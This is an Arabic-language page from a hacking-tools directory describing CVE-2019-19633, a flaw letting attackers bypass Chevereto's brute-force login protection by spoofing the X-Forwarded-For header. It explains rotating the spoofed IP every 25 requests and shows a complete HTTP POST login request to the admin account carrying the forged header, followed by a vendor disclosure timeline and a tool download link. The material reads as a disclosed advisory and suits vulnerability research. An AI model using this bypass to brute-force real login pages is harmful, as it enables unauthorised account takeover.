Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-19633 — الملف lib/G/functions.php في Chevereto من الإصدار 1.0.0 إلى 1.1.4 Free، وإلى 3.13.5 Core، يتيح للمهاجم تنفيذ هجمات القوة الغاشمة دون تفعيل آلية الحماية المطبّقة، وذلك عبر التلاعب بترويسة X-Forwarded-For في الطلب. | Kitploit
أدوات/GitHubGitHub/jra89/cve-2019-19633
هجمات كلمات المرورتحليل الثغرات الأمنيةالتهرب من IDS/IPSاستغلال تطبيقات الويبجمع المعلومات
GitHubjra89/cve-2019-19633

CVE-2019-19633

الملف lib/G/functions.php في Chevereto من الإصدار 1.0.0 إلى 1.1.4 Free، وإلى 3.13.5 Core، يتيح للمهاجم تنفيذ هجمات القوة الغاشمة دون تفعيل آلية الحماية المطبّقة، وذلك عبر التلاعب بترويسة X-Forwarded-For في الطلب.

عرض المستودع
13منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-19633

يسمح ملف lib/G/functions.php في Chevero من الإصدار 1.0.0 حتى 1.1.4 Free، ومن خلال 3.13.5 Core، للمهاجم بتنفيذ هجمات القوة الغاشمة دون تفعيل آلية الحماية المطبَّقة، وذلك من خلال التلاعب بترويسة X-Forwarded-For في الطلب. يجب تغيير عنوان IP الموجود في الترويسة كل 25 طلبًا (الافتراضي 25) لتجنّب تفعيل الحماية وحظر عنوان IP (ليس أن ذلك مهم).

الطلبات الخمسة والعشرون الأولى

X-Forwarded-For: 8.8.8.1, 8.8.8.2

الموجة الثانية من 25 طلبًا

X-Forwarded-For: 8.8.8.2, 8.8.8.3

وهكذا دواليك...

root@kitploit:~
POST /login HTTP/1.1
Host: 192.168.0.88
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://192.168.0.88
DNT: 1
Connection: close
Referer: http://192.168.0.88/login
X-Forwarded-For: 8.8.8.228, 8.8.8.88
Cookie: PHPSESSID=16dal7t7fmdbd86ahjkp8qo43a
Upgrade-Insecure-Requests: 1

login-subject=admin&password=test&auth_token=fb22558fc0f068d3cfb9ca98b413c8d0adbbc205

الجدول الزمني (الإفصاح الافتراضي خلال 90 يومًا)

  • 2019-12-07 - تم إبلاغ البائع بالنتيجة
  • 2019-12-07 - استجاب البائع
  • 2020-03-07 - الموعد النهائي
تنزيل الأداة